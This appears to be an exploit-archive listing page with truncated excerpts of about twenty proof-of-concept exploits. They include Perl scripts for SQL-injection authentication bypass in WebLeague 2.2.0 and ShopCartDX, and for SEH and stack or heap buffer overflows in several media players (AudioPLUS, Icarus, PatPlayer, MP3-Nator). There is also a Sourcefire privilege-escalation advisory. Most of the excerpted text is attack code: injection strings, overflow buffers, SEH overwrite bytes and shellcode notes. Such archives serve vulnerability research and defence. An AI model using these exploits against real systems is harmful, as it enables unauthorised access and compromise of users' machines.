WebLeague 2.2.0 SQL Injection / Authentication Bypass

!/usr/bin/perl -W WebLeague 2.2.0 Remote Admin Bypass p0c written by ka0x need magicquotesgpc = Off Vuln code Admin/index.php : 10: $sql="SELECT FROM $admintable WHERE name = '$POSTusername' AND password = '$POSTpassword'"; // --- NOT CLEAN $POST VARS 11: $result=mysqlquery$sql,$db; 12: $number =...

webLeague 2.2.0 (Auth Bypass) Remote SQL Injection Exploit

Exploit for unknown platform in category web applications ========================================================== webLeague 2.2.0 Auth Bypass Remote SQL Injection Exploit ========================================================== !/usr/bin/perl -W WebLeague 2.2.0 Remote Admin Bypass p0c writte...

AudioPLUS 2.00.215 SEH Overwrite

!/usr/bin/perl AudioPLUS 2.00.215 .m3u .lst Universal Seh Overwrite Exploit first exploiter hack4love http://www.milw0rm.com/exploits/9064 and this the universal for .lst .m3u extention Big Thnx to his0ka my best freind :d Stack print "AudioPLUS 2.00.215 .m3u .lst Universal Seh Overwrite...

Icarus 2.0 - '.icp' Local Buffer Overflow (SEH)

!/usr/bin/perl by hack4love [email protected] Icarus 2.0 .ICP File Local buffer Overflow seh Greetz to all my friends form egypt easy :d PoC by : ThE g0bL!N this work sooooooooo good USAGE put the file GUEST.ICP in Icarus Directory Tested on: Windows XP Pro SP2 EN my $bof="\x41" x 18204; my...

AudioPLUS 2.00.215 (.m3u .lst) Universal SEH Overwrite Exploit

Exploit for unknown platform in category local exploits ============================================================== AudioPLUS 2.00.215 .m3u .lst Universal SEH Overwrite Exploit ============================================================== !/usr/bin/perl AudioPLUS 2.00.215 .m3u .lst Universal...

Icarus 2.0 (.ICP File) Local Stack Overflow PoC

Exploit for unknown platform in category dos / poc =============================================== Icarus 2.0 .ICP File Local Stack Overflow PoC =============================================== !/usr/bin/perl Icarus 2.0GUEST.ICP Local Stack Overflow PoC By ThE g0bL!N usage: After Clicking On Perl...

Icarus 2.0 - '.ICP' Local Stack Overflow (PoC)

!/usr/bin/perl Icarus 2.0GUEST.ICP Local Stack Overflow PoC By ThE g0bL!N usage: After Clicking On Perl File Run The Program And Choose Continue Booom The Program Crashed : $Header="\x73\x65\x72\x76\x65\x72\x20\x3D" ; $junk="\x41" x 5000 ; openmyfile,'GUEST.ICP'; print myfile $Header.$junk;...

M3U/M3L to ASX/WPL 1.1 (ASX,M3U,M3L) Local BOF PoC

Exploit for unknown platform in category dos / poc ================================================== M3U/M3L to ASX/WPL 1.1 ASX,M3U,M3L Local BOF PoC ================================================== !/usr/bin/perl M3U/M3L to ASX/WPL v1.1 asx,m3u,m3l Local Stack Overflow POC Download:...

Playlistmaker 1.5 (.M3U/M3L/TXT File) Local Stack Overflow PoC

Exploit for unknown platform in category dos / poc ============================================================== Playlistmaker 1.5 .M3U/M3L/TXT File Local Stack Overflow PoC ============================================================== !/usr/bin/perl Playlistmaker v1.5 .M3U/M3L/Txt File Local...

PatPlayer 3.9 (M3U File) Local Heap Overflow PoC

No description provided by source. !/usr/bin/perl PatPlayer v3.9 M3U File Local Heap Overflow PoC Found By : Cyber-Zone ABDELKHALEK Greatz : All friends Jiko : Sec-r1z.CoM ..... IQ-TY .... EAX 41414141 ECX 00000000 EDX 004F1FC0 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" EBX 00B928DC E...

otsAV DJ 1.85.064 (.ofl File) Local Heap Overflow PoC

No description provided by source. !/usr/bin/perl Found By :: HACK4LOVE all i want say welcom back 3asfh otsAV DJ 1.85.064 .ofl File Local Heap Overflow PoC http://x.download.otszone.com/static/otsavdjtrialsetup.exe my $crash="\x41" x 5000; openmyfile,'hack4love.OFL'; print myfile $crash; sebug.n...

Sourcefire 3D Sensor and DC, privilege escalation vulnerability

Affected product ---------------- Sourcefire 3D Sensor and Defense Center 4.8.x Tested on 4.8.0.3 and 4.8.0.4, 3D Sensor 2500 & DC 1000 All 4.8.x releases, up to and including 4.8.1, confirmed vulnerable by sourcefire. Vulnerability details --------------------- A privilege escalation vulnerabili...

ShopCartDX 4.30 Blind SQL Injection

!/usr/bin/perl 0-Day ShopCartDx newGET = $Host; my $HTTP = new LWP::UserAgent; my $Referrer = "http://warwolfz.altervista.org/"; my $DefaultTime = request$Referrer; sub BlindSQLJnjection my $dec,$hex = @; return "./productdetail.php?cid=-1 OR 1!=SELECT...

ShopCartDx 4.30 SQL Injection

!/usr/bin/perl 0-Day ShopCartDx 'Mozilla/5.0', maxredirect = 0, cookiejar = $Cookies, or die $!; my $Get = $UserAgent-get$HostName.SQLInjection$MemberID; if$Get-content = /0-91,5 : a-zA-Z0-9-.2,15 : a-zA-Z0-91,15/i refresh$HostName, $1, $2, $3; print " Exploit Successed \n"; print "...

Sourcefire 3D Sensor / Defense Center Privilege Escalation

Affected product ---------------- Sourcefire 3D Sensor and Defense Center 4.8.x Tested on 4.8.0.3 and 4.8.0.4, 3D Sensor 2500 & DC 1000 All 4.8.x releases, up to and including 4.8.1, confirmed vulnerable by sourcefire. Vulnerability details --------------------- A privilege escalation vulnerabili...

AudioPLUS 2.00.215 Buffer Overflow

!/usr/bin/perl AudioPLUS 2.00.215 .pls Local buffer Overflow seh print "AudioPLUS 2.00.215 .pls Local buffer Overflow seh\n"; my $header = "playlist\x0ANumberOfEntries=1\x0AFile1=http://"; my $junk="\x41" x 4103; my $nseh="\xEB\x06\x90\x90"; my $seh="\x35\x2F\xD1\x72"; jmp msacm32.drv ebx my...

AudioPLUS 2.00.215 - .lst .m3u Local Buffer Overflow (SEH)

AudioPLUS 2.00.215 - .lst .m3u Local Buffer Overflow SEH !/usr/bin/perl by hack4love [email protected] AudioPLUS 2.00.215 .m3u / .lst File Local buffer Overflow seh Greetz to all my friends form egypt easy :d Tested on: Windows XP Pro SP2 EN my $bof="\x41" x 4116; my $nsh="\xEB\x06\x90\x90"; ...

AudioPLUS 2.00.215 - '.pls' Local Buffer Overflow (SEH)

!/usr/bin/perl AudioPLUS 2.00.215 .pls Local buffer Overflow seh print "AudioPLUS 2.00.215 .pls Local buffer Overflow seh\n"; my $header = "playlist\x0ANumberOfEntries=1\x0AFile1=http://"; my $junk="\x41" x 4103; my $nseh="\xEB\x06\x90\x90"; my $seh="\x35\x2F\xD1\x72"; jmp msacm32.drv ebx my...

AudioPLUS 2.00.215 - .pls Local Buffer Overflow (SEH)

AudioPLUS 2.00.215 - .pls Local Buffer Overflow SEH !/usr/bin/perl AudioPLUS 2.00.215 .pls Local buffer Overflow seh print "AudioPLUS 2.00.215 .pls Local buffer Overflow seh\n"; my $header = "playlist\x0ANumberOfEntries=1\x0AFile1=http://"; my $junk="\x41" x 4103; my $nseh="\xEB\x06\x90\x90"; my...

MP3-Nator 2.0 Buffer Overflow

!/usr/bin/perl + Bug : Mp3-Nator 2.0 plf Universal Buffer Overflow Exploit SEH + Author : ThE g0bL!N Greetz to all my friends Download:http://files.brothersoft.com/mp3audio/players/mp3nator.zip Tested on: Windows XP Pro SP2 Fr win32exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum...